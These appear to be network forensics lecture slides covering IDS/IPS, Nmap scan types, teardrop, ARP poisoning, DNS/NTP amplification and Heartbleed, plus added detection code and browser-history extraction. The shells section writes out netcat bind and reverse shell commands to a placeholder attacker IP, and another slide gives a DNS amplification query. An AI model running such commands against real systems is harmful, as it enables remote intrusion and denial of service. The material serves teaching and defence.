Computer forensics 2015-12-01




Network forensics

Outline
- Evidence acquisition
- Protocol analysis
- Packet analysis
- Flow analysis
- Network logs
- Network devices
- Network intrusion detection/prevention systems
- Common network attacks
- Web browser forensics

Network intrusion detection/prevention systems
- Specialized sniffers with the added capability of evaluating captured traffic to determine whether it is malicious or legitimate.
- After rebranding, most IDS products have become IPS (Intrusion Prevention System) products.
- Over the years, the IDS/IPS product space has developed two separate niches:
  - NIDS/NIPS monitor network traffic and alert on suspicious network events.
  - HIDS/HIPS monitor system events and alert on suspicious system activities.

NIDS/NIPS as a source of evidence
- Often a very good starting point in an investigation: they detect potentially adverse events via network monitoring, so chances are they have logged the incident being investigated.
- Unfortunately, they cannot always reconstruct a sequence of events and explain them to us, at least not easily.
- Still useful because:
  - Logs contain details about illicit connections (or even attempts) that are not recorded anywhere else.
  - They can be configured to alert on and log traffic that firewalls deem perfectly acceptable.
  - An investigator could potentially modify a NIDS/NIPS configuration to begin detecting events it was not previously configured to record.
  - NIDS/NIPS are well positioned as inspection points for network traffic.

NIDS/NIPS functionality
- Rules: descriptions of how to compare a packet or stream with known malicious traffic.
- Alerts: lists of suspicious packets/streams.
- Packet captures: certain NIDS/NIPS can be configured to capture suspicious packets and save them for later analysis (not always configured to do this by default).
- Other features: higher-layer protocol awareness, signature-based analysis, behavioral analysis.

Types of evidence
- Configuration
- Alert data
- Packet header and/or flow record information
- Packet payloads
- Activities correlated across multiple sensors
- NIDS/NIPS are specifically designed to sift through large amounts of network traffic and pick out specific events of interest, particularly those that relate to security. Useful as a starting point!

NIDS/NIPS products
- Commercial: Check Point IPS-1, Cisco IPS, Corero Network Security, Enterasys IPS, HP TippingPoint IPS, IBM Security NIPS, Sourcefire 3D System
- Open source: Snort, Bro Network Security Monitor

Snort
- Open source NIPS and NIDS (Martin Roesch, 1998)
- Free subscriptions for rules
- Three modes: sniffer, traffic logger, NIDS
- Detects probes or attacks: operating system fingerprinting attempts, common gateway interface (CGI) attacks, buffer overflows, server message block (SMB) probes, stealth port scans, ...

Common network attacks

Usual steps of an attack
1. Reconnaissance: browse various information sources for knowledge about the target system (search engines, social networks, WHOIS databases or DNS).
2. Enumeration (or scanning): systematically identifying systems and collecting information; finding vulnerabilities (openings) in the target organization, such as WiFi access points, Internet gateways, available systems, vulnerable services.
3. Exploitation: actively exploit a security weakness in order to gain access to a system, cause denial of service, etc.
4. Post-exploitation: once access to a system is obtained, an attacker can use this system as a foothold for other attacks, or gather sensitive information (e.g. passwords, certificates) from the compromised system in order to compromise another one.

Scans and attacks covered
- Scans: SYN stealth scan; Idle (zombie) scan; FIN, Null and Xmas tree scans; TCP connect() scan; UDP scan; IP protocol scan; Ping scan
- Attacks: Teardrop; ARP poisoning; Password guessing; Bind shell; Reverse shell; DoS attacks (NTP, DNS); Heartbleed

Port scans
- Important because they are extremely often used in the enumeration phase of an attack: usually the only way of identifying and enumerating open services on a target network device.
- There are various types of port scans; they have different impact on the target system and can be observed in different ways.
- Good attackers are known to delete logs and other useful traces of an exploit. Analyzing network logs for port scans can nevertheless help in identifying the attack source, because scanning usually occurs prior to an exploit (days, weeks or more earlier) and it is possible that an attacker forgets (or is unable) to delete such traces.

Nmap
- Most famous tool: Nmap. Capable of conducting various types of port scans and other identification techniques often used by attackers: OS identification, service identification, checking for known vulnerabilities (limited but sometimes useful). https://nmap.org/bennieston-tutorial
- Zenmap: a GUI interface for nmap, no additional features except for the GUI.
- Our focus is on identifying the various port scanning methods.

The TCP three-way handshake
Port scans leverage the three-way TCP handshake:
1. The client sends SYN (SYNchronize) to an open TCP port that has a service bound to it, e.g. HTTP (port 80), SMTP (25), POP3 (110) or SSH (22).
2. The server side responds with SYN ACK: "I ACKnowledge your SYN and I want to SYNchronize also."
3. The client answers the SYN ACK with an ACK.

SYN stealth scan
- Just initiates and then closes (RST) the connection:
    Attacker -> Target : SYN
    Target -> Attacker : SYN, ACK
    Attacker -> Target : RST

Filtered ports
- The job of a firewall is to protect a system from unwanted packets that could harm the system. E.g. an attacker is conducting a port scan against port 81; there is no service running on this port, so using a firewall to block access to it is the best practice.
- A "filtered" port result from Nmap indicates that the port has not responded at all: the SYN packet has simply been dropped by the firewall.

Closed ports
- Closed ports most commonly indicate that there is no service running on the port, BUT the firewall has allowed the connection to go through to the server.
- It can also mean there is no firewall present at all.

Open ports
- This is what attackers are looking for when using port scans.
- An open service (port) could be a publicly accessible service that is by its nature supposed to be accessible, but it could also be a back-end service that does not need to be publicly accessible and therefore should be blocked by a firewall.

Scan types
- SYN stealth scan: the example explained on the previous slide.
- Explained in more detail on the following slides: TCP connect() scan; FIN, Null and Xmas tree scans; Ping scan; IP protocol scan; UDP scan.
- Idle scan (or zombie scan): an advanced, highly stealthy technique in which no packets identifying the attacker's machine are sent to the target directly; rather, a third (innocent) computer is involved, by sending packets to the target forged to look like they came from that third computer. More information: https://nmap.org/book/idlescan.html

TCP connect() scan
- These scans are called connect() scans because UNIX sockets programming uses a system call named connect() to begin a TCP connection to a remote site. If connect() succeeds, a connection was made; if it fails, the connection could not be made (the remote system is offline, the port is closed, or some other error occurred along the way).
- Very effective: provides a clear picture of the ports you can and cannot access. If a connect() scan lists a port as open, you can definitely connect to it, because that is what the scanning computer just did!
- Major drawback: the scan is very easy to detect on the system being scanned. A firewall or intrusion detection system will log all connect() attempts to every port on the system (and will almost always trigger a warning!). For this reason, the SYN stealth scan was developed.

FIN, Xmas tree and Null scans
- Many modern firewalls and IDS detect SYN scans, but:
  1. The FIN scan sends a packet with only the FIN flag set.
  2. The Xmas tree scan sets the FIN, URG and PUSH flags.
  3. The Null scan sends a packet with no flags switched on.
- Because a closed port will respond with RST to all of these probes, while an open port will ignore them (it is waiting for a SYN first).
- But Windows does not follow RFC 793 and ignores these packets even on closed ports, so if you also run a SYN stealth scan you can tell this is a Windows system.

UDP scan
- Sends 0-byte UDP packets to each target port. Receipt of an ICMP Port Unreachable message signifies the port is closed; otherwise it is assumed open.
- A major problem with this technique: when a firewall blocks outgoing ICMP Port Unreachable messages, the port will appear open. These false positives are hard to distinguish from real open ports.
- Another disadvantage of UDP scanning is the speed at which it can be performed: most operating systems limit the number of ICMP Port Unreachable messages which can be generated in a certain time period, thus slowing down a UDP scan.
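As an added illustration of the scan types above (not code from the slides), the following Python classifies captured TCP probes by their flag signature, infers the open/closed/filtered state Nmap would report from the target's reply, and flags sources that probe many ports in a short window; the probe records and field names are constructed for the example.

```python
"""Classify TCP probes by flag signature and flag port-scanning sources.

Added example, not from the slides: it encodes the scan types the slides
describe (SYN stealth vs. connect(), FIN, Null, Xmas) and the Nmap-style
port states inferred from the target's replies. Records are constructed.
"""
from collections import defaultdict, namedtuple

# TCP flag bits as laid out in the TCP header flags byte
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
PROBE_NAMES = {0: "null", FIN: "fin", FIN | PSH | URG: "xmas", SYN: "syn"}
STEALTH_PROBES = (0, FIN, FIN | PSH | URG)   # probes an open port ignores

# One probe: time, scanner, target port, probe flags, the target's reply flags
# (None if nothing came back) and what the scanner sent after a SYN/ACK.
Probe = namedtuple("Probe", "ts src dport flags reply followup",
                   defaults=(None,))

def probe_type(flags):
    """Name the scan technique a probe's flags suggest ("syn" also starts connect())."""
    return PROBE_NAMES.get(flags, "other")

def port_state(probe_flags, reply_flags):
    """Infer the state a scanner records for one probe/reply pair."""
    if reply_flags is None:
        # Open ports ignore FIN/Null/Xmas probes (they wait for a SYN), so
        # silence is ambiguous there; Windows ignores them even when closed.
        return "open|filtered" if probe_flags in STEALTH_PROBES else "filtered"
    if reply_flags & RST:
        return "closed"
    if reply_flags & SYN and reply_flags & ACK:
        return "open"
    return "unknown"

def summarize(probes):
    """Technique name and per-state port lists for one source's probes."""
    kinds = {probe_type(p.flags) for p in probes}
    states = defaultdict(set)
    for p in probes:
        states[port_state(p.flags, p.reply)].add(p.dport)
    technique = ",".join(sorted(kinds))
    if kinds == {"syn"}:
        # The scanner's third packet separates connect() (ACK) from stealth (RST)
        third = {p.followup for p in probes if p.reply and p.reply & SYN}
        if third and third <= {ACK}:
            technique = "tcp_connect"
        elif third and third <= {RST}:
            technique = "syn_stealth"
    return {"technique": technique,
            "ports": {k: sorted(v) for k, v in states.items()}}

def detect_scans(probes, min_ports=5, window=10.0):
    """Flag sources that probe >= min_ports distinct ports within `window` s."""
    by_src = defaultdict(list)
    for p in probes:
        by_src[p.src].append(p)
    findings = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda p: p.ts)
        start = 0
        for end in range(len(recs)):
            while recs[end].ts - recs[start].ts > window:
                start += 1
            if len({p.dport for p in recs[start:end + 1]}) >= min_ports:
                findings[src] = summarize(recs)
                break
    return findings

# Constructed traffic: a SYN stealth scan, an Xmas scan and one normal client
SAMPLE = [
    Probe(0.0, "10.0.0.5", 22, SYN, SYN | ACK, RST),
    Probe(0.1, "10.0.0.5", 25, SYN, RST),
    Probe(0.2, "10.0.0.5", 80, SYN, SYN | ACK, RST),
    Probe(0.3, "10.0.0.5", 81, SYN, None),            # dropped by a firewall
    Probe(0.4, "10.0.0.5", 443, SYN, SYN | ACK, RST),
    Probe(5.0, "10.0.0.7", 22, FIN | PSH | URG, None),
    Probe(5.1, "10.0.0.7", 25, FIN | PSH | URG, RST),
    Probe(5.2, "10.0.0.7", 80, FIN | PSH | URG, None),
    Probe(5.3, "10.0.0.7", 110, FIN | PSH | URG, RST),
    Probe(5.4, "10.0.0.7", 443, FIN | PSH | URG, None),
    Probe(7.0, "10.0.0.9", 80, SYN, SYN | ACK, ACK),  # legitimate web client
    Probe(9.0, "10.0.0.9", 80, SYN, SYN | ACK, ACK),
]
```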

IP protocol scan
- Attempts to determine which IP protocols the target supports: sends a raw IP packet without an additional protocol header, for each protocol number, to the target machine. Receipt of an ICMP Protocol Unreachable message tells us that the protocol is not in use; otherwise it is assumed open.
- Not all hosts send ICMP Protocol Unreachable messages; these may include firewalls, AIX, HP-UX and Digital UNIX. These machines will report all protocols open!
- This scan type also falls victim to ICMP rate limiting, the same way as UDP scans; however, since only 256 protocols are possible (8-bit protocol field in the IP header), it should not take too long.

Ping scan
- Lists the hosts within the specified range that responded to a ping. It allows an attacker to detect which computers are online, rather than which ports are open.
- Methods commonly used for ping sweeping:
  - Sending an ICMP ECHO REQUEST (ping request) packet to the destination system. If an ICMP ECHO REPLY is received, the system is up and ICMP packets are not blocked.
  - TCP ping: sends either a SYN or an ACK packet to any port (80 is the default) on the remote system. If a RST or a SYN/ACK is returned, the remote system is online. If the remote system does not respond, either it is offline or the chosen port is filtered (and thus not responding to anything).

Attacks

Teardrop attack
- A teardrop attack is a denial of service (DoS) attack conducted by targeting TCP/IP fragmentation reassembly code.
- The attack causes fragmented packets to overlap one another on the target host; the host attempts to reconstruct them during reassembly but fails.
- Gigantic payloads are sent to the machine that is being targeted, causing system crashes.
- One of the fields in an IP header is the fragment offset field. It indicates the starting position (offset) of the data contained in a fragmented packet relative to the data in the original packet.
- If the sum of the offset and size of one fragment does not match the offset at which the next fragment starts, the fragments overlap. When this happens, a server vulnerable to teardrop attacks is unable to reassemble the packets, resulting in a denial-of-service condition.
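The offset-and-size check described above, as an added Python example that is not from the slides: it reads the fragment offset field from raw IPv4 headers (constructed here, checksum left zero) and rejects fragment sets that overlap instead of reassembling them; the helper and field names are mine.

```python
"""Spot overlapping IPv4 fragments, the condition a teardrop attack creates.

Added example, not from the slides. It reads the fragment offset field the
slides describe from raw IPv4 headers and checks that consecutive fragments
tile the datagram exactly, rejecting overlaps instead of copying them the
way a teardrop-vulnerable reassembly routine did. Headers are constructed.
"""
import struct

IP_MF = 0x2000           # "more fragments" flag in the flags/offset field
IP_OFFSET_MASK = 0x1FFF  # 13-bit fragment offset, in units of 8 bytes

def parse_fragment(packet):
    """Return (offset_bytes, more_fragments, payload_length) for one IPv4 packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    frag_field = struct.unpack("!H", packet[6:8])[0]
    offset = (frag_field & IP_OFFSET_MASK) * 8
    return offset, bool(frag_field & IP_MF), total_len - ihl

def build_fragment(offset, payload_len, more):
    """Constructed IPv4 header (20 bytes, UDP, checksum 0) plus dummy payload."""
    frag_field = (IP_MF if more else 0) | (offset // 8)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0x1234,
                         frag_field, 64, 17, 0,
                         bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))
    return header + b"\x00" * payload_len

def find_overlaps(fragments):
    """List (earlier, later, overlap_bytes) for fragment pairs that overlap.

    fragments: (offset, length) pairs in bytes. Consecutive fragments are
    consistent only when offset_a + length_a == offset_b (the slide's
    'sum of offset and size' test); a smaller offset_b means an overlap.
    """
    ordered = sorted(fragments)
    overlaps = []
    for (off_a, len_a), (off_b, len_b) in zip(ordered, ordered[1:]):
        end_a = off_a + len_a
        if off_b < end_a:
            overlaps.append(((off_a, len_a), (off_b, len_b), end_a - off_b))
    return overlaps

def naive_copy_length(first, second):
    """Bytes a naive reassembler computes for `second` after trimming the overlap.

    Classic teardrop: the second fragment ends inside the first, so
    (end_b - end_a) goes negative; as an unsigned length that is enormous.
    """
    (off_a, len_a), (off_b, len_b) = first, second
    return (off_b + len_b) - (off_a + len_a)

def reassemble(packets):
    """Validate a fragment set from raw packets; raise rather than reassemble a bad one."""
    frags, total = [], None
    for pkt in packets:
        offset, more, length = parse_fragment(pkt)
        frags.append((offset, length))
        if not more:
            total = offset + length      # the last fragment fixes the datagram size
    overlaps = find_overlaps(frags)
    if overlaps:
        raise ValueError(f"overlapping fragments (teardrop?): {overlaps}")
    expected = 0
    for off, length in sorted(frags):
        if off != expected:
            raise ValueError(f"gap before offset {off}")
        expected = off + length
    if total is None or expected != total:
        raise ValueError("fragment set incomplete")
    return sorted(frags)

# Constructed datagrams: one clean 2000-byte datagram, one teardrop-style pair
CLEAN = [build_fragment(0, 1480, True), build_fragment(1480, 520, False)]
TEARDROP = [build_fragment(0, 36, True), build_fragment(24, 4, False)]
```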

ARP poisoning
- Works by sending unsolicited ARP messages that contain the IP address of a network resource, such as the default gateway or a DNS server, and replace the real MAC address of the network resource with the attacker's own MAC address.
- Network devices (by design) use the new information and overwrite any existing ARP data for that IP address.
- As a consequence, all packets sent to the legitimate system will instead be delivered to the attacker. The attacker then takes the role of the man in the middle: any traffic destined for the legitimate resource is sent through the attacking system.
- As this attack occurs on the lower layers of the OSI model, the end user is oblivious to the attack.

Password guessing
- Online password guessing is an often used method of gaining access to a victim system/account.
- It is a very loud way of trying to gain access: a lot of network traffic is generated, so it is easy to spot in network traces as a lot of authentication requests answered with an error and sent in a small time frame (e.g. 5 seconds).

Shells
- How does an attacker gain access to a vulnerable system? What happens when an attacker exploits a vulnerability?
- There is no easy (or unique) answer, but for the most part an attacker wishes to gain remote code execution ability. This way they can run ANY command on the victim system and do anything with that computer.
- This is accomplished by exploiting some vulnerability which allows remote code execution AND instructing the victim to start a shell with which an attacker can issue more commands without having to exploit the same vulnerability again.
- Shell types: bind shell, reverse shell.

Bind shell
- Binds an application (e.g. /bin/bash) to a TCP/UDP port: any machine that connects to this port will be presented with the application that was bound, with the same privileges as the user that bound it.
- A bind shell simply opens up a port on the victim and binds the desired application.
- Example: nc -lvvp 1234 -e cmd.exe will connect cmd.exe to port 1234; from the attacking machine: nc IP_addr_of_victim 1234

Shell access
- Gaining access to a remote computer and the privilege to execute commands.

Bind shells and firewalls
- With a classical bind shell the attacker needs to connect to the shell, which means the victim needs to open this port. Not a problem: this is done by the exploit.
- However, if there is a firewall protecting the victim, it will most likely block any incoming traffic, and thus block the attacker's attempt to connect, even though the exploit was successfully triggered!

Reverse shell
- Instead of using a bind shell, forcing the victim to open a port and then trying to connect to it, an attacker can instruct the victim to start the connection and connect back to the attacker, thus bypassing a firewall, since firewalls are usually configured to pass connections initiated from within the protected area.
- On the target computer the attacker forces the command nc IP_attacker 1234 -e cmd.exe; on his own computer the attacker executes nc -l 1234

Denial of service
- DoS attacks are an attempt to make a machine or network unavailable to its intended users.
- They present one of the most significant threats to the assurance of dependable and secure information systems.
- Very limited defense mechanisms.
- One of the most often used attacks: requires only a lot of bandwidth, but no infrastructure or knowledge; can be bought easily via underground markets.
- DDoS (Distributed DoS): many (third-party) computers attack the victim; very difficult to defend against or counteract.

Types of DoS attacks
- Flood attacks, using amplification attacks: NTP, DNS
- Protocol vulnerability exploitation attacks
- Malformed packet attacks, e.g. Teardrop (explained earlier)

Reflection and amplification attacks
- Amplification is a type of reflection attack. Reflection attacks involve eliciting a response from a legitimate (third-party) server to a spoofed IP address (the victim's): the attacker sends a packet to a legitimate third-party server with a forged source IP address (the victim's), and the server replies to the victim's address. Similar to mail-ordering goods to the address of your victim.
- NTP amplification: an attacker repeatedly sends the "get monlist" request to an NTP server while spoofing the requesting IP address to that of the victim server. The NTP server responds by sending the list to the spoofed IP address. This response is much larger than the request, thus amplifying the amount of traffic directed at the target server and ultimately leading to a degradation of service for legitimate requests.

DNS amplification
- There are two criteria for a good amplification attack vector:
  - the query can be sent with a spoofed source address via a protocol like ICMP or UDP that does not require a handshake;
  - the response to the query is significantly larger than the query itself.
- DNS is a core, ubiquitous Internet service that meets these criteria and therefore has become the largest source of amplification attacks.
- DNS queries are typically transmitted over UDP; as a result, their source address can be spoofed and the receiver has no way of determining its veracity before responding.
- DNS is capable of generating a much larger response than the query.

DNS amplification example
- The following (tiny, 64-byte) query: dig ANY isc.org @x.x.x.x, where x.x.x.x is the IP of an open DNS resolver, will result in a response that is about 3,200 bytes long.
- A 64-byte query resulted in a 3,200-byte response. In other words, an attacker is able to achieve 50x amplification over whatever traffic they can initiate to an open DNS resolver, and requests can be sent not only to one DNS server but to many.

Heartbleed
- A vulnerability in the popular OpenSSL cryptographic software library. It enables an attacker to steal the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet.
- SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
- The Heartbleed bug allows anyone on the Internet to read the memory of systems protected by vulnerable versions of the OpenSSL software. This, in turn, can compromise the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.

How does Heartbleed work?
- It exploits a bug in the SSL heartbeat protocol. The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation: the heartbeat keeps the context between the peers alive, hence the keep-alive nomenclature.
- How it works: a heartbeat message is sent with some provisional data; the peer simply copies this data and sends it back.
- An attacker can control the heartbeat size and structure it to be larger than expected, for example send 1 byte but claim to be sending 64k. Sent to the target server using TCP on port 443, the response contains up to 64 kB of data: one byte will be the attacker's, but the rest up to 64k will be memory content from outside the bounds of what the heartbeat should be able to access.
- Doing it again with a different heartbeat size gets another 64 kB response from another memory region, and so on. Over time, the attacker can reassemble the victim's memory 64 kB at a time and gain access to sensitive information: passwords, private keys, basically anything in memory.

HeartbeatMessage structure
    struct {
        HeartbeatMessageType type;
        uint16 payload_length;
        opaque payload[HeartbeatMessage.payload_length];
        opaque padding[padding_length];
    } HeartbeatMessage;
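An added Python example, not from the slides or from OpenSSL, that applies the length check described above to captured TLS records: it parses the record header and the HeartbeatMessage fields (type, payload_length) and reports how many bytes beyond the real payload a vulnerable peer would echo. The byte string 1803020003014000 is the pattern the slides cite as typical of exploit traffic; the other records and the helper names are constructed.

```python
"""Flag TLS heartbeat records whose payload_length lies about the payload.

Added example, not from the slides or from OpenSSL. It parses the 5-byte TLS
record header and the HeartbeatMessage layout the slides show (type,
payload_length, payload, padding) and reports the over-read a vulnerable
peer would perform. The bytes 1803020003014000 are the pattern the slides
cite as typical of exploit traffic; the other records are constructed.
"""
import struct

TLS_HEARTBEAT = 0x18            # TLS record content type for heartbeats
HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
MIN_PADDING = 16                # RFC 6520 requires at least 16 bytes of padding

def parse_heartbeat_record(record):
    """Parse one TLS record; describe the heartbeat in it and whether it is bogus."""
    if len(record) < 5:
        raise ValueError("truncated TLS record header")
    content_type, major, minor, rec_len = struct.unpack("!BBBH", record[:5])
    if content_type != TLS_HEARTBEAT:
        return {"heartbeat": False, "content_type": content_type}
    body = record[5:5 + rec_len]
    if len(body) < 3:
        raise ValueError("heartbeat body shorter than type + payload_length")
    hb_type, claimed = struct.unpack("!BH", body[:3])
    available = rec_len - 3           # bytes that can hold payload + padding
    # The check OpenSSL lacked: 1 + 2 + payload_length + 16 must fit the record
    bogus = claimed + MIN_PADDING > available
    return {
        "heartbeat": True,
        "version": (major, minor),
        "type": hb_type,
        "claimed_payload_length": claimed,
        "available": available,
        # bytes a vulnerable peer would echo from beyond the real payload
        "over_read": max(0, claimed - available),
        "bogus": bogus,
    }

def suspicious_heartbeats(records):
    """Indexes of records an analyst should look at: heartbeats that over-claim."""
    hits = []
    for i, rec in enumerate(records):
        info = parse_heartbeat_record(rec)
        if info["heartbeat"] and info["bogus"]:
            hits.append(i)
    return hits

def build_heartbeat(payload, padding_len=MIN_PADDING, claimed=None):
    """Constructed heartbeat request record; `claimed` overrides the true length."""
    claimed = len(payload) if claimed is None else claimed
    body = (struct.pack("!BH", HEARTBEAT_REQUEST, claimed) + payload
            + b"\x00" * padding_len)
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, len(body)) + body

# Records from a constructed capture: the slides' pattern, a benign request,
# a record that over-claims only slightly, and an unrelated application-data record
EXPLOIT_PATTERN = bytes.fromhex("1803020003014000")      # cited on the slides
BENIGN = build_heartbeat(b"ping")
OVERCLAIM = build_heartbeat(b"ping", claimed=0x0100)
CAPTURE = [BENIGN, EXPLOIT_PATTERN, OVERCLAIM,
           bytes.fromhex("1703020005") + b"\x00" * 5]
```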

Heartbleed evidence
- A (lengthy) explanation and PoC code can be found at: http://www.garage4hackers.com/entry.php?b=2551
- A forensic investigator needs to notice the following: most exploits will send a heartbeat message which in hexadecimal representation looks like this: 1803020003014000. This is the hexadecimal representation of the HeartbeatMessage struct on the previous slide; it is present in most heartbeat attacks.

Web browser forensics
- Searching for evidence left by web browsing activity is typically a crucial component of digital forensic investigations.
- Almost every activity a user performs while using a web browser leaves a trace on the computer, even searching for information using a web browser. Therefore, when an investigator analyzes a computer, this evidence can provide useful information.
- Cache, history, cookies and the download list are useful because they contain evidence of web sites visited, the time and frequency of access, and the search engine keywords used.
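As an added Python example (not from the slides), the following reads the kinds of evidence just listed out of a Firefox-style places.sqlite history database: it mirrors the moz_places and moz_historyvisits tables and Firefox's microsecond timestamps, which are assumptions here, fills them with constructed rows, and extracts sites visited, time and frequency of access, and search-engine keywords; open_history() runs the same queries against a copy of a real file.

```python
"""Extract visit evidence from a Firefox-style places.sqlite history database.

Added example, not from the slides. It builds an in-memory SQLite database
mirroring the two tables Firefox keeps history in (moz_places and
moz_historyvisits, a subset of their columns, visit_date in microseconds
since the Unix epoch) and fills it with constructed rows, then pulls out what
the slides list as useful: sites visited, time and frequency of access, and
search-engine keywords. Pass a path to a *copy* of a real places.sqlite to
open_history() to run the same queries on evidence.
"""
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlparse

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Query-string parameter carrying the search terms, per search host (assumed list)
SEARCH_PARAMS = {"www.google.com": "q", "www.bing.com": "q",
                 "duckduckgo.com": "q", "search.yahoo.com": "p"}

def open_history(path):
    """Open a places.sqlite copy read-only (never the live profile file)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)

def prtime_to_iso(microseconds):
    """Firefox stores PRTime: microseconds since 1970-01-01 UTC."""
    return (EPOCH + timedelta(microseconds=microseconds)).isoformat()

def visits(conn):
    """Every visit in chronological order with URL, title and UTC timestamp."""
    rows = conn.execute("""
        SELECT p.url, p.title, v.visit_date
        FROM moz_historyvisits v JOIN moz_places p ON p.id = v.place_id
        ORDER BY v.visit_date""")
    return [{"url": url, "title": title, "visited_at": prtime_to_iso(ts)}
            for url, title, ts in rows]

def visit_frequency(conn):
    """How often each host was visited (frequency of access)."""
    freq = {}
    for v in visits(conn):
        host = urlparse(v["url"]).hostname
        freq[host] = freq.get(host, 0) + 1
    return freq

def search_terms(conn):
    """Search-engine keywords recovered from visited URLs, in time order."""
    terms = []
    for v in visits(conn):
        parsed = urlparse(v["url"])
        param = SEARCH_PARAMS.get(parsed.hostname)
        if param:
            for query in parse_qs(parsed.query).get(param, []):
                terms.append({"when": v["visited_at"],
                              "engine": parsed.hostname, "query": query})
    return terms

def build_sample_db():
    """Constructed stand-in for places.sqlite with a handful of visits."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT);
        CREATE TABLE moz_historyvisits (id INTEGER PRIMARY KEY,
                                        place_id INTEGER, visit_date INTEGER);""")
    conn.executemany("INSERT INTO moz_places VALUES (?, ?, ?)", [
        (1, "https://example.org/", "Example"),
        (2, "https://www.google.com/search?q=nmap+syn+scan", "nmap syn scan"),
        (3, "https://example.org/docs", "Docs"),
        (4, "https://duckduckgo.com/?q=heartbleed+poc&t=h_", "heartbleed poc"),
    ])
    def prtime(h, m, s):   # constructed visits on the lecture date, 2015-12-01 UTC
        when = datetime(2015, 12, 1, h, m, s, tzinfo=timezone.utc)
        return int((when - EPOCH) / timedelta(microseconds=1))
    conn.executemany("INSERT INTO moz_historyvisits VALUES (?, ?, ?)", [
        (1, 1, prtime(9, 0, 0)), (2, 2, prtime(9, 5, 10)), (3, 3, prtime(9, 6, 0)),
        (4, 1, prtime(10, 15, 0)), (5, 4, prtime(11, 0, 0)),
    ])
    return conn
```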

Browser history locations
- Each web browser has its own location.
- Internet Explorer:
  - Versions 4 to 9 use the Internet Explorer History File Format (or MSIE 4-9 Cache File format). The cache files, commonly named index.dat, are used to store both cache and historical information.
  - Version 10: C:\Users\%USER%\AppData\Local\Microsoft\Windows\WebCache\ ; the WebCacheV01.dat and WebCacheV24.dat files are in the Extensible Storage Engine (ESE) Database File (EDB) format.
- Firefox stores the history of visited sites in a file named places.sqlite, usually at C:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\Profiles\%PROFILE%.default. It is an SQLite file, easily browsable using the tool SQLiteBrowser: http://sqlitebrowser.org/

Conclusion
- This was merely a short overview of some attacks and vulnerabilities. Each day this list grows.
- The examples in this course are meant to provide you with the tools and knowledge necessary to handle new challenges on your own.
